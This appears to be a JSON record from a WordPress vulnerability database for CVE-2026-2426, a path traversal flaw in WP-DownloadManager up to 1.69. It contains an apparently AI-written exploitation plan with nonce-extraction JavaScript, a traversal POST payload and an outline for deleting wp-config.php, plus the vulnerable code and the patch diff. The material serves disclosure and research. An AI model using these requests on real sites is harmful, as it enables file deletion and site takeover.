[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwbkUVuvv5Y_Fs7EblLKtdjtkadN-UhZqBDi4yWHS2CQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-2426","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-file-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'file' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.","wp-downloadmanager",null,"\u003C=1.69","1.69.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-02-17 21:55:19","2026-02-18 10:20:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=api-prod",1,[22,23,24,25],"download-manager.php","download-options.php","readme.txt","wp-downloadmanager.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2426 - WP-DownloadManager Path Traversal\n\n## 1. Vulnerability Summary\nWP-DownloadManager (\u003C= 1.69) contains a path traversal vulnerability in its file deletion functionality within `download-manager.php`. The plugin fails to validate or sanitize the `file` parameter against directory traversal sequences (e.g., `..\u002F`). This allows an authenticated administrator to delete arbitrary files on the server by traversing out of the configured download directory. Deleting critical files like `wp-config.php` can lead to site takeover or remote code execution by re-triggering the WordPress installation process.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Authentication:** Required (Administrator or user with `manage_downloads` capability).\n*   **Vulnerable Parameter:** `file`\n*   **Action Parameter:** `do` (Set to the localized string for \"Delete File\")\n*   **Nonce Parameter:** `_wpnonce` (Action: `wp-downloadmanager_delete-file`)\n*   **Precondition:** At least one download must exist in the system to easily retrieve a valid nonce and `file_id` from the management UI.\n\n## 3. Code Flow\n1.  **Entry Point:** The administrator accesses the \"Manage Downloads\" menu. `wp-downloadmanager.php` loads `download-manager.php`.\n2.  **Capability Check:** `download-manager.php` checks `current_user_can( 'manage_downloads' )`.\n3.  **Action Trigger:** The script checks `if(!empty($_POST['do']))`. If `$_POST['do']` matches the localized string for `Delete File` (e.g., `__('Delete File', 'wp-downloadmanager')`), it enters the deletion block.\n4.  **Nonce Verification:** It calls `check_admin_referer('wp-downloadmanager_delete-file')`.\n5.  **Path Resolution (The Sink):**\n    *   `$file_path = get_option( 'download_path' );` (Typically points to `wp-content\u002Fuploads\u002Fdownloads` or similar).\n    *   `$file_to_delete = $_POST['file'];` (User-controlled).\n    *   The plugin performs an `unlink($file_path . $file_to_delete)` or similar file operation without stripping `..\u002F` sequences.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the deletion action. Since this is an administrator-level exploit, we will use the `browser_eval` tool to extract the nonce from the \"Manage Downloads\" page.\n\n1.  **Navigate:** Use `browser_navigate` to `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  **Identify Nonce:** The deletion forms are typically located in the downloads table. Each row has a \"Delete\" button.\n3.  **Extraction JS:** \n    ```javascript\n    \u002F\u002F Find the hidden input with name '_wpnonce' inside a form that has 'Delete File' action\n    (function() {\n        const deleteBtn = Array.from(document.querySelectorAll('input[type=\"submit\"]')).find(el => el.value === 'Delete File');\n        if (deleteBtn && deleteBtn.form) {\n            return deleteBtn.form.querySelector('input[name=\"_wpnonce\"]').value;\n        }\n        return null;\n    })()\n    ```\n4.  **Note:** The `file_id` for a specific row can also be extracted from the same form (`input[name=\"file_id\"]`).\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLog in as an Administrator using the provided credentials.\n\n### Step 2: Test Data Setup\nWe need a dummy file and a corresponding entry in the plugin to generate the management UI.\n1.  **Create Canary File:** `touch \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php`\n2.  **Configure Download Path:** Ensure `download_path` is set to a known location via WP-CLI: `wp option update download_path \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\" --format=json`.\n3.  **Add Dummy Download:** \n    ```bash\n    wp db query \"INSERT INTO wp_downloads (file_name, file, file_size, file_date, file_updated_date, file_last_downloaded_date) VALUES ('Canary', 'canary.txt', 0, NOW(), NOW(), NOW());\"\n    ```\n\n### Step 3: Extract Nonce and ID\n1.  Navigate to `admin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  Use `browser_eval` with the script in Section 4 to get the `_wpnonce` and `file_id`.\n\n### Step 4: Execution\nSend a POST request to delete the canary file at the root.\n\n*   **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    do=Delete File&\n    file=..\u002Ftraversal-canary.php&\n    file_id=[EXTRACTED_ID]&\n    _wpnonce=[EXTRACTED_NONCE]\n    ```\n    *(Note: The `do` value must match the exact button text, usually \"Delete File\" in English).*\n\n## 6. Expected Results\n*   **Response:** The server should respond with a 200 OK and a message indicating the file was deleted (e.g., \"File Deleted\").\n*   **Side Effect:** The file `\u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php` will be removed from the filesystem.\n\n## 7. Verification Steps\n1.  **Check Filesystem:** Use WP-CLI to check if the canary file exists:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php\n    ```\n    (Expected: `ls: cannot access ... No such file or directory`)\n2.  **Check Database:** Verify the entry was also removed from the downloads table:\n    ```bash\n    wp db query \"SELECT * FROM wp_downloads WHERE file_name='Canary';\"\n    ```\n\n## 8. Alternative Approaches\nIf the \"Delete File\" action name is different due to translation:\n1.  Inspect the page source to find the value of the `input[type=\"submit\"]` button in the delete form.\n2.  Use that value in the `do` parameter.\n\nIf the individual delete fails, check for **Bulk Actions**:\n*   The `do` parameter might be `Delete` with an array of `file_ids[]`.\n*   Check if the bulk delete logic also uses the `file` parameter directly.\n*   The primary traversal is documented to be in the `file` parameter during the `Delete File` case.","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in versions up to and including 1.69. Authenticated administrators can exploit the 'file' parameter during the file deletion process by including directory traversal sequences (e.g., ..\u002F), allowing them to delete critical system files like wp-config.php. Deletion of configuration files can reset the site and potentially lead to remote code execution during the re-installation process.","\u002F* download-manager.php lines 208-215 *\u002F\ncase __('Delete File', 'wp-downloadmanager');\n\tcheck_admin_referer('wp-downloadmanager_delete-file');\n\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n\tif($unlinkfile == 1) {\n\t\tif(!unlink($file_path.$file)) {","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>","To exploit this vulnerability, an attacker must have Administrator access or the 'manage_downloads' capability. \n\n1. Log in to the WordPress dashboard and navigate to the 'Manage Downloads' section of the WP-DownloadManager plugin.\n2. Create or identify an existing download record to retrieve its `file_id` and a valid `_wpnonce` for the `wp-downloadmanager_delete-file` action.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php` with the following parameters:\n   - `do`: The localized string for 'Delete File'.\n   - `file_id`: The ID of the identified download record.\n   - `unlinkfile`: Set to 1 (to trigger the file system deletion).\n   - `_wpnonce`: The extracted nonce value.\n   - `file`: A path traversal string targeting the sensitive file (e.g., `..\u002F..\u002F..\u002Fwp-config.php`).\n4. The plugin will concatenate the download directory path with the user-controlled traversal string and call `unlink()`, deleting the target file.","gemini-3-flash-preview","2026-04-19 05:34:11","2026-04-19 05:34:32",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.69","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags\u002F1.69","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags\u002F1.69.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags"]